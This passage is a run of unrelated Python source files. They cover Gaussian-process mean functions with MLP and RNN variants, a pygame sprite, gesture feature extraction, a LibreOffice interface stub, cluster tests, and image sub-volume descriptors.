tensor X and returns a tensor m(X). In accordance with the GPflow
standard, each row of X represents one datum, and each row of Y is computed
independently for each row of X.
MeanFunction classes can have parameters, see the Linear class for an
example.
"""
def __call__(self, X):
raise NotImplementedError("Implement the __call__\
method for this mean function")
def __add__(self, other):
return Additive(self, other)
def __mul__(self, other):
return Product(self, other)
class Zero(MeanFunction):
def __call__(self, X, X_train=None): # modified
return tf.zeros(tf.stack([tf.shape(X)[0], 1]), dtype=float_type)
class Linear(MeanFunction):
"""
y_i = A x_i + b
"""
def __init__(self, A=None, b=None):
"""
A is a matrix which maps each element of X to Y, b is an additive
constant.
If X has N rows and D columns, and Y is intended to have Q columns,
then A must be D x Q, b must be a vector of length Q.
"""
A = np.ones((1, 1)) if A is None else A
b = np.zeros(1) if b is None else b
MeanFunction.__init__(self)
self.A = Param(np.atleast_2d(A))
self.b = Param(b)
def __call__(self, X):
return tf.matmul(X, self.A) + self.b
class Constant(MeanFunction):
"""
y_i = c,,
"""
def __init__(self, c=None):
MeanFunction.__init__(self)
c = np.zeros(1) if c is None else c
self.c = Param(c)
def __call__(self, X):
shape = tf.stack([tf.shape(X)[0], 1])
return tf.tile(tf.reshape(self.c, (1, -1)), shape)
class SwitchedMeanFunction(MeanFunction):
"""
This class enables to use different (independent) mean_functions respective
to the data 'label'.
We assume the 'label' is stored in the extra column of X.
"""
def __init__(self, meanfunction_list):
MeanFunction.__init__(self)
for m in meanfunction_list:
assert isinstance(m, MeanFunction)
self.meanfunction_list = ParamList(meanfunction_list)
self.num_meanfunctions = len(self.meanfunction_list)
def __call__(self, X):
ind = tf.gather(tf.transpose(X), tf.shape(X)[1]-1) # ind = X[:,-1]
ind = tf.cast(ind, tf.int32)
X = tf.transpose(tf.gather(tf.transpose(X), tf.range(0, tf.shape(X)[1]-1))) # X = X[:,:-1]
# split up X into chunks corresponding to the relevant likelihoods
x_list = tf.dynamic_partition(X, ind, self.num_meanfunctions)
# apply the likelihood-function to each section of the data
results = [m(x) for (x, m) in zip(x_list, self.meanfunction_list)]
# stitch the results back together
partitions = tf.dynamic_partition(tf.range(0, tf.size(ind)), ind, self.num_meanfunctions)
return tf.dynamic_stitch(partitions, results)
class Additive(MeanFunction):
def __init__(self, first_part, second_part):
MeanFunction.__init__(self)
self.add_1 = first_part
self.add_2 = second_part
def __call__(self, X):
return tf.add(self.add_1(X), self.add_2(X))
class Product(MeanFunction):
def __init__(self, first_part, second_part):
MeanFunction.__init__(self)
self.prod_1 = first_part
self.prod_2 = second_part
def __call__(self, X):
return tf.multiply(self.prod_1(X), self.prod_2(X))
class TwoLayerSigmoidMLP(MeanFunction):
"""
(Custom) Two layer MLP with sigmoid activation function.
"""
def __init__(self, W1=None, W2=None, b1=None, b2=None, input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
W1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W1 is None else W1
W2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W2 is None else W2
b1 = np.zeros(hidden_dim) if b1 is None else b1
b2 = np.zeros(output_dim) if b2 is None else b2
MeanFunction.__init__(self)
self.W1 = Param(np.atleast_2d(W1))
self.W2 = Param(np.atleast_2d(W2))
self.b1 = Param(b1)
self.b2 = Param(b2)
self.is_class = is_class
def __call__(self, X, X_train=None):
if self.is_class:
return tf.sigmoid(tf.matmul(tf.sigmoid(tf.matmul(X, self.W1) + self.b1), self.W2) + self.b2)
else:
return tf.matmul(tf.sigmoid(tf.matmul(X, self.W1) + self.b1), self.W2) + self.b2
class MixtureExpertsMLP2(MeanFunction):
"""
(Custom) Mixture of experts with MLP as basis function.
Number of experts are 2.
"""
def __init__(self, W1_1=None, W1_2=None, b1_1=None, b1_2=None, W2_1=None, W2_2=None, b2_1=None, b2_2=None,
input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
# Expert 1 parameters
W1_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W1_1 is None else W1_1
W1_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W1_2 is None else W1_2
b1_1 = np.zeros(hidden_dim) if b1_1 is None else b1_1
b1_2 = np.zeros(output_dim) if b1_2 is None else b1_2
# Expert 2 parameters
W2_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W2_1 is None else W2_1
W2_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W2_2 is None else W2_2
b2_1 = np.zeros(hidden_dim) if b2_1 is None else b2_1
b2_2 = np.zeros(output_dim) if b2_2 is None else b2_2
# Gate softmax parameter
W = 1e-1*np.random.randn(input_dim, 1) # expert numbers - 1
MeanFunction.__init__(self)
self.W1_1 = Param(np.atleast_2d(W1_1))
self.W1_2 = Param(np.atleast_2d(W1_2))
self.b1_1 = Param(b1_1)
self.b1_2 = Param(b1_2)
self.W2_1 = Param(np.atleast_2d(W2_1))
self.W2_2 = Param(np.atleast_2d(W2_2))
self.b2_1 = Param(b2_1)
self.b2_2 = Param(b2_2)
self.W = Param(np.atleast_2d(W))
def __call__(self, X, X_train=None):
e1 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W1_1) + self.b1_1), self.W1_2) + self.b1_2
e2 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W2_1) + self.b2_1), self.W2_2) + self.b2_2
g1 = tf.sigmoid(tf.matmul(X, self.W))
g2 = 1 - g1
return (e1*g1) + (e2*g2)
class MixtureExpertsMLP4(MeanFunction):
"""
(Custom) Mixture of experts with MLP as basis function.
Number of experts are 2.
"""
def __init__(self, W1_1=None, W1_2=None, b1_1=None, b1_2=None, W2_1=None, W2_2=None, b2_1=None, b2_2=None,
W3_1=None, W3_2=None, b3_1=None, b3_2=None, W4_1=None, W4_2=None, b4_1=None, b4_2=None,
input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
# Expert 1 parameters
W1_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W1_1 is None else W1_1
W1_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W1_2 is None else W1_2
b1_1 = np.zeros(hidden_dim) if b1_1 is None else b1_1
b1_2 = np.zeros(output_dim) if b1_2 is None else b1_2
# Expert 2 parameters
W2_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W2_1 is None else W2_1
W2_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W2_2 is None else W2_2
b2_1 = np.zeros(hidden_dim) if b2_1 is None else b2_1
b2_2 = np.zeros(output_dim) if b2_2 is None else b2_2
# Expert 3 parameters
W3_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W3_1 is None else W3_1
W3_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W3_2 is None else W3_2
b3_1 = np.zeros(hidden_dim) if b3_1 is None else b3_1
b3_2 = np.zeros(output_dim) if b3_2 is None else b3_2
# Expert 4 parameters
W4_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W4_1 is None else W4_1
W4_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W4_2 is None else W4_2
b4_1 = np.zeros(hidden_dim) if b4_1 is None else b4_1
b4_2 = np.zeros(output_dim) if b4_2 is None else b4_2
# Gate softmax parameter
W = 1e-1*np.random.randn(input_dim, 4) # expert numbers
MeanFunction.__init__(self)
self.W1_1 = Param(np.atleast_2d(W1_1))
self.W1_2 = Param(np.atleast_2d(W1_2))
self.b1_1 = Param(b1_1)
self.b1_2 = Param(b1_2)
self.W2_1 = Param(np.atleast_2d(W2_1))
self.W2_2 = Param(np.atleast_2d(W2_2))
self.b2_1 = Param(b2_1)
self.b2_2 = Param(b2_2)
self.W3_1 = Param(np.atleast_2d(W3_1))
self.W3_2 = Param(np.atleast_2d(W3_2))
self.b3_1 = Param(b3_1)
self.b3_2 = Param(b3_2)
self.W4_1 = Param(np.atleast_2d(W4_1))
self.W4_2 = Param(np.atleast_2d(W4_2))
self.b4_1 = Param(b4_1)
self.b4_2 = Param(b4_2)
self.W = Param(np.atleast_2d(W))
def __call__(self, X, X_train=None):
e1 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W1_1) + self.b1_1), self.W1_2) + self.b1_2
e2 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W2_1) + self.b2_1), self.W2_2) + self.b2_2
e3 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W3_1) + self.b3_1), self.W3_2) + self.b3_2
e4 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W4_1) + self.b4_1), self.W4_2) + self.b4_2
g = tf.nn.softmax(tf.matmul(X, self.W))
g1 = g[:,0:1]
g2 = g[:,1:2]
g3 = g[:,2:3]
g4 = g[:,3:4]
return (e1*g1) + (e2*g2) + (e3*g3) + (e4*g4)
class TwoLayerReLUMLP(MeanFunction):
"""
(Custom) Two layer MLP with ReLU activation function.
"""
def __init__(self, W1=None, W2=None, b1=None, b2=None, input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
W1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W1 is None else W1
W2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W2 is None else W2
b1 = np.zeros(hidden_dim) if b1 is None else b1
b2 = np.zeros(output_dim) if b2 is None else b2
MeanFunction.__init__(self)
self.W1 = Param(np.atleast_2d(W1))
self.W2 = Param(np.atleast_2d(W2))
self.b1 = Param(b1)
self.b2 = Param(b2)
self.is_class = is_class
def __call__(self, X, X_train=None):
if self.is_class:
return tf.sigmoid(tf.matmul(tf.maximum(tf.matmul(X, self.W1) + self.b1, 0), self.W2) + self.b2)
else:
return tf.matmul(tf.maximum(tf.matmul(X, self.W1) + self.b1, 0), self.W2) + self.b2
class RNN_OneLayer(MeanFunction):
"""
(Custom) Vanilla RNN with one hidden layer.
"""
def __init__(self, Wemb=None, W=None, Wout=None, bemb=None, b=None, bout=None, \
input_dim=1, hidden_dim=10, output_dim=1, length=None):
Wemb = 1e-1*np.random.randn(input_dim, hidden_dim) if Wemb is None else Wemb
W = 1e-1*np.random.randn(2*hidden_dim, hidden_dim) if W is None else W
Wout = 1e-1*np.random.randn(hidden_dim, output_dim) if Wout is None else Wout
b = np.zeros(hidden_dim) if b is None else b
bout = np.zeros(output_dim) if bout is None else bout
MeanFunction.__init__(self)
self.Wemb = Param(np.atleast_2d(Wemb))
self.W = Param(np.atleast_2d(W))
self.Wout = Param(np.atleast_2d(Wout))
self.b = Param(b)
self.bout = Param(bout)
self.length = length
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
# dummy
W2 = np.zeros((2*hidden_dim, hidden_dim))
self.W2 = Param(np.atleast_2d(W2))
# TODO Also, have to implement evaluating training points
def __call__(self, X, is_predict=False, X_train=None):
if is_predict:
length = 1
H_pred = tf.concat([X_train, X], axis=0)
out_pred = tf.matmul(H_pred, self.Wout) + self.bout
return tf.reshape(out_pred[-length:, :], [length, -1])
else:
H = X
return tf.matmul(H, self.Wout) + self.bout
class RNN_TwoLayer(MeanFunction):
"""
(Custom) Vanilla RNN with two hidden layer.
"""
def __init__(self, Wemb=None, W=None, W2=None, Wout=None, bemb=None, b=None, b2=None, bout=None, \
input_dim=1, hidden_dim=10, output_dim=1, length=None):
Wemb = 1e-1*np.random.randn(input_dim, hidden_dim) if Wemb is None else Wemb
W = 1e-1*np.random.randn(2*hidden_dim, hidden_dim) if W is None else W
W2 = 1e-1*np.random.randn(2*hidden_dim, hidden_dim) if W2 is None else W2
Wout = 1e-1*np.random.randn(hidden_dim, output_dim) if Wout is None else Wout
b = np.zeros(hidden_dim) if b is None else b
b2 = np.zeros(hidden_dim) if b2 is None else b2
bout = np.zeros(output_dim) if bout is None else bout
MeanFunction.__init__(self)
self.Wemb = Param(np.atleast_2d(Wemb))
self.W = Param(np.atleast_2d(W))
self.W2 = Param(np.atleast_2d(W2))
self.Wout = Param(np.atleast_2d(Wout))
self.b = Param(b)
self.b2 = Param(b2)
self.bout = Param(bout)
self.length = length
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
# TODO Also, have to implement evaluating training points
def __call__(self, X, is_predict=False, X_train=None):
if is_predict:
length = 1
H_embedded_pred = tf.matmul(tf.concat([X_train, X], axis=0), self.W2[0:self.hidden_dim, :])
H2_pred = []
for i in range(self.length+length):
if i == 0:
H2_pred.append(tf.tanh(H_embedded_pred[i,:]))
else:
toAdd_pred = tf.matmul(tf.reshape(H2_pred[i-1], [1, -1]), \
self.W2[self.hidden_dim:2*self.hidden_dim, :]) + self.b2
H2_pred.append(tf.tanh(H_embedded_pred[i,:] + toAdd_pred[0, :]))
H2_pred = tf.stack(H2_pred, axis=0)
out_pred = tf.matmul(H2_pred, self.Wout) + self.bout
return tf.reshape(out_pred[-length:, :], [length, -1])
else:
H_embedded = tf.matmul(X, self.W2[0:self.hidden_dim, :])
H2 = []
for i in range(self.length):
if i == 0:
H2.append(tf.tanh(H_embedded[i,:]))
else:
toAdd = tf.matmul(tf.reshape(H2[i-1], [1, -1]), \
self.W2[self.hidden_dim:2*self.hidden_dim, :]) + self.b2
H2.append(tf.tanh(H_embedded[i,:] + toAdd[0, :]))
H2 = tf.stack(H2, axis=0)
return tf.matmul(H2, self.Wout) + self.bout
class RNN_OneLayer_DKGP(MeanFunction):
"""
(Custom) Vanilla RNN with one hidden layer.
"""
def __init__(self, input_dim, hidden_dim, output_dim, Wout=None, bout=None):
Wout = 1e-1*np.random.randn(input_dim, output_dim) if Wout is None else Wout
bout = np.zeros(output_dim) if bout is None else bout
MeanFunction.__init__(self)
self.Wout = Param(np.atleast_2d(Wout))
self.bout = Param(bout)
def __call__(self, X, X_train=None):
return tf.matmul(X, self.Wout) + self.bout
class RNN_TwoLayer_DKGP(MeanFunction):
"""
(Custom) Vanilla RNN with two hidden layer.
"""
def __init__(self, input_dim, hidden_dim, output_dim, W2=None, Wout=None, b2=None, bout=None):
W2 = 1e-1*np.random.randn(input_dim+hidden_dim, hidden_dim) if W2 is None else W2
Wout = 1e-1*np.random.randn(hidden_dim, output_dim) if Wout is None else Wout
b2 = np.zeros(hidden_dim) if b2 is None else b2
bout = np.zeros(output_dim) if bout is None else bout
MeanFunction.__init__(self)
self.W2 = Param(np.atleast_2d(W2))
self.Wout = Param(np.atleast_2d(Wout))
self.b2 = Param(b2)
self.bout = Param(bout)
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
def __call__(self, X, X_train=None):
length = tf.shape(X)[0]
if X_train == None:
_X = X
_length = length
else:
_X = tf.cond(tf.equal(length, 1), lambda: tf.concat([X_train, X], axis=0), lambda: X)
_length = tf.cond(tf.equal(length, 1), lambda: tf.shape(_X)[0], lambda: length)
Xemb = tf.matmul(_X, self.W2[0:self.input_dim, :])
i = tf.constant(1)
H = tf.reshape(tf.tanh(Xemb[0, :]), [1,-1])
def cond(i, Xemb, H, _length):
return i < _length
def body(i, Xemb, H, _length):
toAdd = tf.matmul(tf.reshape(H[i-1, :], [1,-1]), self.W2[self.input_dim:self.input_dim+self.hidden_dim, :]) + self.b2
toConcat = tf.tanh(tf.reshape(Xemb[i, :], [1,-1]) + toAdd)
return [tf.add(i, 1), Xemb, tf.concat([H, toConcat], axis=0), _length]
loop_vars = [i, Xemb, H, _length]
shape_invariants = [i.get_shape(), Xemb.get_shape(), tf.TensorShape([None, self.hidden_dim]), _length.get_shape()]
_, _, H, _ = tf.while_loop(cond, body, loop_vars=loop_vars, shape_invariants=shape_invariants)
if X_train == None:
pass
else:
H = tf.cond(tf.equal(length, 1), lambda: tf.reshape(H[-1, :], [1,-1]), lambda: H)
return tf.matmul(H, self.Wout) + self.bout
|
import pygame
from shootingspacejetgame.res import *
class enemy(pygame.sprite.Sprite):
def __init__(self, origin, jdg):
super().__init__()
self.image = pygame.image.load(ENEMY_IMG)
self.image = pygame.transform.scale(self.image, ENEMY_SCALE)
self.image = pygame.transform.rotate(self.image, 180)
self.rect = self.image.get_rect()
self.rect.center = origin
self.valid = True
self.jdg = jdg
def shotCollided(self, fire, surface):
if self.rect.left <= fire.rect.left and self.rect.right >= fire.rect.right:
if self.rect.top <= fire.rect.top and self.rect.bottom >= fire.rect.bottom:
self.jdg.addPoints()
return True
return False
def update(self):
if self.rect.top < SCREEN_HEIGHT:
self.rect.move_ip(0, DY_ENEMY)
else:
self.valid = False
def draw(self, surface):
surface.blit(self.image, self.rect)
def move(self, surface):
self.update()
self.draw(surface)
|
import numpy as np
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error, r2_score
class FeaturesExtractor():
def __init__(self, gestures, fake_swipes_limit=30):
gestures = gestures[(gestures["t_stop"] != -1) & (gestures["t_start"] != -1)]
gestures["duration"] = gestures["t_stop"] - gestures["t_start"]
gestures = gestures[(gestures["duration"] > 0)]
self.taps = gestures[(gestures["type"] == "tap")]
self.swipes = gestures[(gestures["type"] == "swipe") & (gestures["duration"] >= fake_swipes_limit)]
self.fake_swipes = gestures[(gestures["type"] == "swipe") & (gestures["duration"] < fake_swipes_limit)]
print("\n==== Gestures Stats ====")
print("Taps: ", len(self.taps.index))
print("Swipes: ", len(self.swipes.index))
print("Fake swipes: ", len(self.fake_swipes.index), "\n")
def get_tap_features(self, tap):
info = {}
info["type"] = "tap"
info["horizontal_position"] = tap["data"][0]["x0"]
info["vertical_position"] = tap["data"][0]["y0"]
return info
def get_swipe_features(self, swipe):
info = {}
info["type"] = "swipe"
times = []
num_data = len(swipe["data"])+1
if(num_data==2):
times.append(swipe["t_start"])
times.append(swipe["t_stop"])
elif(num_data>2):
step = (swipe["t_stop"]-swipe["t_start"])/(num_data-1)
times.append(swipe["t_start"])
prev = swipe["t_start"]
for i in range(0,num_data-2):
times.append(prev+step)
prev += step
times.append(swipe["t_stop"])
for i in range(0,len(times)):
times[i] -= swipe["t_start"]
x_positions = []
y_positions = []
# Get horizontal and vertical starting points
x_positions.append(swipe["data"][0]["x0"])
y_positions.append(swipe["data"][0]["y0"])
for d in swipe["data"]:
x_positions.append(d["moveX"])
y_positions.append(d["moveY"])
horizontal_length = x_positions[-1] - x_positions[0]
vertical_length = y_positions[-1] - y_positions[0]
info["horizontal_trace_length"] = np.abs(horizontal_length)
info["vertical_trace_length"] = np.abs(vertical_length)
if(np.abs(horizontal_length)>np.abs(vertical_length)):
if(horizontal_length>0):
info["direction"] = "right"
else:
info["direction"] = "left"
else:
if(vertical_length>0):
info["direction"] = "up"
else:
info["direction"] = "down"
# Get statistics of trace
info["trace_stats"] = self.perform_linear_regression(x_positions, y_positions)
info["swipe_horizontal_acceleration"] = (swipe["data"][-1]["vx"] - swipe["data"][0]["vx"])/((swipe["t_stop"] - swipe["t_start"])*0.001)
info["swipe_vertical_acceleration"] = (swipe["data"][-1]["vy"] - swipe["data"][0]["vy"])/((swipe["t_stop"] - swipe["t_start"])*0.001)
mean_x = 0
mean_y = 0
for x in x_positions:
mean_x += x
for y in y_positions:
mean_y += y
mean_x /= len(x_positions)
mean_y /= len(y_positions)
info["mean_x"] = mean_x
info["mean_y"] = mean_y
return info
def get_fake_swipe_features(self, fake_swipe):
info = {}
info["type"] = "fake_swipe"
info["fs_horizontal_position"] = fake_swipe["data"][0]["x0"]
info["fs_vertical_position"] = fake_swipe["data"][0]["y0"]
return info
def calculate_features(self):
features = []
for ind in self.taps.index:
features.append(self.get_tap_features(self.taps.loc[ind]))
for ind in self.swipes.index:
features.append(self.get_swipe_features(self.swipes.loc[ind]))
for ind in self.fake_swipes.index:
features.append(self.get_fake_swipe_features(self.fake_swipes.loc[ind]))
return features
def perform_linear_regression(self, x_pos, y_pos):
x_train = np.array(x_pos).reshape(-1, 1)
y_train = np.array(y_pos).reshape(-1, 1)
# Create linear regression object
regr = linear_model.LinearRegression()
# Train the model using the training sets
regr.fit(x_train, y_train)
# Predict based on the constructed model
pred = regr.predict(x_train)
info = {}
info["slope"] = regr.coef_[0][0]
info["mean_squared_error"] = mean_squared_error(y_train, pred)
info["mean_abs_error"] = mean_absolute_error(y_train, pred)
info["median_abs_error"] = median_absolute_error(y_train, pred)
info["coef_determination"] = r2_score(y_train, pred)
return info
|
def html_it():
"""Run coverage and make an HTML report for main."""
import coverage
cov = coverage.coverage()
cov.start()
import main # pragma: nested
cov.stop() # pragma: nested
cov.html_report(directory="../html_omit_1")
runfunc(html_it, rundir="src")
compare("gold_omit_1", "html_omit_1", size_within=10, file_pattern="*.html")
clean("html_omit_1")
|
import cv2 as cv
def model_ssd_inception_v2_coco():
pretrained = "models/ssd_inception_v2_coco.pb"
proto = "models/ssd_inception_v2_coco.pbtxt"
labels = "models/coco_labels.txt"
class_names = []
with open(labels) as f:
class_names = [cname.strip() for cname in f.readlines()]
net = cv.dnn.readNetFromTensorflow(pretrained, proto)
model = cv.dnn_DetectionModel(net)
model.setInputParams(size=(300, 300), scale=1 / 255, swapRB=True)
return class_names, model
|
import os
caminho = input('digite um caminho de pasta: ')
conta = 0
termo_procura = input('digite o que procura: ')
from formataTamanho import formata_tamanho
for raiz, diretorios, arquivos in os.walk(caminho):
for arquivo in arquivos:
if termo_procura in arquivo:
try:
conta += 1
caminho_completo = os.path.join(raiz, arquivo) # pegando o caminho dos arquivos dentro dessa pasta
nome_arquivo, ext_arquivo = os.path.splitext(arquivo)
tamanho = os.path.getsize(caminho_completo) # pega o tamanho dos dados em bytes
print('\nEncontrei o arquivo:', arquivo)
print('caminho: ', caminho_completo)
print('Nome: ', nome_arquivo)
print('Extenção: ', ext_arquivo)
print('Tamanho', tamanho)
print('Tamanho formatado', formata_tamanho(tamanho))
except PermissionError as e:
print('Sem permissao para acessar a pasta')
except FileNotFoundError as e:
print('Arquivo nao encontrado')
except Exception as e:
print('Erro desconhecido: ', e)
print(f'{conta} arquivos encontrados')
|
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Interface Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.sdbcx
from abc import abstractmethod
from ..uno.x_interface import XInterface as XInterface_8f010a43
class XRowLocate(XInterface_8f010a43):
"""
is used to identify rows within a result set and to find rows by a bookmark.
Bookmarks are only valid in the scope of the current result set and are not interchangeable between result sets. A bookmark could be a complex data structure, so it could not be compared in a safe way. Because of that, a provider has to implement the compare method for bookmarks.
See Also:
`API XRowLocate <https://api.libreoffice.org/docs/idl/ref/interfacecom_1_1sun_1_1star_1_1sdbcx_1_1XRowLocate.html>`_
"""
__ooo_ns__: str = 'com.sun.star.sdbcx'
__ooo_full_ns__: str = 'com.sun.star.sdbcx.XRowLocate'
__ooo_type_name__: str = 'interface'
__pyunointerface__: str = 'com.sun.star.sdbcx.XRowLocate'
@abstractmethod
def compareBookmarks(self, first: object, second: object) -> int:
"""
compares two bookmarks and returns an indication of their relative values.
The bookmarks must apply to the same ResultSet. You cannot reliably compare bookmarks from different ResultSets, even if they were created from the same source or statement.
A bookmark that is not valid, or incorrectly formed, will cause an exception.
Raises:
com.sun.star.sdbc.SQLException: ``SQLException``
"""
@abstractmethod
def getBookmark(self) -> object:
"""
returns the bookmark of the current row of a result set.
Raises:
com.sun.star.sdbc.SQLException: ``SQLException``
"""
@abstractmethod
def hasOrderedBookmarks(self) -> bool:
"""
determines whether the bookmarks of a result set are ordered or not.
Raises:
com.sun.star.sdbc.SQLException: ``SQLException``
"""
@abstractmethod
def hashBookmark(self, bookmark: object) -> int:
"""
returns the hash value for a specified bookmark.
Raises:
com.sun.star.sdbc.SQLException: ``SQLException``
"""
@abstractmethod
def moveRelativeToBookmark(self, bookmark: object, rows: int) -> bool:
"""
moves the cursor a relative number of rows, either positive or negative starting at a given bookmark position.
If the bookmark could not be located, a result set will be positioned after the last record.
If the bookmark is invalid, or not generated by the current result set, then the behavior is not defined, even an abnormal termination is possible.
Raises:
com.sun.star.sdbc.SQLException: ``SQLException``
"""
@abstractmethod
def moveToBookmark(self, bookmark: object) -> bool:
"""
moves the cursor to the row identified by a valid bookmark.
If the bookmark could not be located, a result set will be positioned after the last record.
If the bookmark is invalid, or not generated by the current result set, then the behavior is not defined, even an abnormal termination is possible.
Raises:
com.sun.star.sdbc.SQLException: ``SQLException``
"""
__all__ = ['XRowLocate']
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
import time
from testcasebase import TestCaseBase
from libs.deco import *
from libs.test_loader import load
import libs.utils as utils
from libs.logger import infoLogger
@multi_dimension(True)
class TestShowTablet(TestCaseBase):
def test_showtablet_healthy(self):
"""
健康的节点,状态为kTabletHealthy
:return:
"""
rs1 = self.showtablet(self.ns_leader)
infoLogger.info(rs1)
self.assertEqual(rs1[self.leader][0], 'kTabletHealthy')
self.assertEqual(rs1[self.slave1][0], 'kTabletHealthy')
self.assertEqual(rs1[self.slave2][0], 'kTabletHealthy')
def test_showtablet_offline(self):
"""
挂掉的节点,状态为kTabletOffline,启动后恢复为kTabletHealthy
:return:
"""
self.stop_client(self.slave1)
time.sleep(10)
rs1 = self.showtablet(self.ns_leader)
infoLogger.info(rs1)
self.assertEqual(rs1[self.leader][0], 'kTabletHealthy')
self.assertEqual(rs1[self.slave1][0], 'kTabletOffline')
self.assertEqual(rs1[self.slave2][0], 'kTabletHealthy')
self.start_client(self.slave1)
time.sleep(5)
rs2 = self.showtablet(self.ns_leader)
self.assertEqual(rs2[self.slave1][0], 'kTabletHealthy')
if __name__ == "__main__":
load(TestShowTablet)
|
''' A module for demonstrating exceptions '''
def convert(s):
''' convert string to an integer '''
try:
x = int(s)
print("Conversion is successful!")
except ValueError:
x = -1
print("Conversion is failed!")
except TypeError:
x = -1
print("Conversion failed. Wrong Type!")
return x
if __name__ == "__main__":
print("Convert String to int", convert("10"))
print("Convert String to int", convert([1, 2, 3, 4]))
|
import os
from types import SimpleNamespace
config = SimpleNamespace()
def setup(args):
global config
config.in_folder = args.in_folder
config.out_folder = args.out_folder
config.tmp_folder = "{}_tmp".format(args.in_folder)
config.labels_folder = "{}_labels".format(args.in_folder)
config.stops_file = "{}/stops.co".format(config.tmp_folder)
config.nodes_file = "{}/nodes.co".format(config.out_folder)
config.edges_file = "{}/edges.gr".format(config.out_folder)
if not os.path.exists(config.out_folder):
os.makedirs(config.out_folder)
if not os.path.exists(config.tmp_folder):
os.makedirs(config.tmp_folder)
|
# coding=utf-8
"""
Wrapper for sub images that form part of a larger volume
Author: Tom Doel
Copyright UCL 2017
"""
import copy
import os
import numpy as np
from imagesplit.file.format_factory import FormatFactory
from imagesplit.file.metaio_reader import load_mhd_header
from imagesplit.image.combined_image import Axis
from imagesplit.utils.json_reader import write_json, read_json
from imagesplit.utils.utilities import ranges_for_max_block_size, \
convert_to_array
class SubImageRanges(object):
"""Convert range arrays to image parameters"""
def __init__(self, ranges):
self.ranges = ranges
self.origin_start = [r[0] for r in self.ranges]
self.origin_end = [r[1] for r in self.ranges]
self.image_size = [1 + r[1] - r[0] for r in self.ranges]
self.roi_start = [r[0] + r[2] for r in self.ranges]
self.roi_end = [r[1] - r[3] for r in self.ranges]
self.roi_size = [1 + (r[1] - r[3]) - (r[0] + r[2]) for r in self.ranges]
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
return False
def __ne__(self, other):
return not self.__eq__(other)
class GlobalImageDescriptor(object):
"""Describes a full combined image"""
def __init__(self, size, file_format, dim_order_condensed, data_type, msb,
voxel_size):
self.data_type = data_type
self.file_format = file_format
self.size = size
self.num_dims = len(size)
self.msb = msb
dim_order = dim_order_condensed if dim_order_condensed \
else np.arange(1, self.num_dims + 1).tolist()
self.axis = Axis.from_condensed_format(dim_order)
self.voxel_size = voxel_size
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
return False
def __ne__(self, other):
return not self.__eq__(other)
class SubImageDescriptor(object):
"""Describes an image in relation to a larger image"""
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
def __init__(self, filename, file_format, data_type,
template, ranges, dim_order_condensed, suffix, index, msb,
compression, voxel_size):
self.suffix = suffix
self.index = index
self.filename = filename
self.file_format = file_format
self.data_type = data_type
self.template = template
self.ranges = SubImageRanges(ranges)
self.axis = Axis.from_condensed_format(dim_order_condensed)
self.msb = msb
self.compression = compression
self.voxel_size = voxel_size
def get_local_size(self):
"""Transpose the subimage size to the local coordinate system"""
return np.take(self.ranges.image_size, self.axis.dim_order).tolist()
def get_local_origin(self):
"""Transpose the subimage origin to the local coordinate system"""
return np.take(self.ranges.origin_start, self.axis.dim_order).tolist()
def get_local_voxel_size(self):
"""Transpose the subimage origin to the local coordinate system"""
return np.take(self.voxel_size, self.axis.dim_order).tolist()
@staticmethod
def from_dict(descriptor_dict):
"""Create SubImageDescriptor from dictionary entries"""
return SubImageDescriptor(
filename=descriptor_dict["filename"],
file_format=descriptor_dict["file_format"],
data_type=descriptor_dict["data_type"],
template=descriptor_dict["template"],
ranges=descriptor_dict["ranges"],
dim_order_condensed=descriptor_dict["dim_order"],
suffix=descriptor_dict["suffix"],
index=descriptor_dict["index"],
msb=descriptor_dict["msb"],
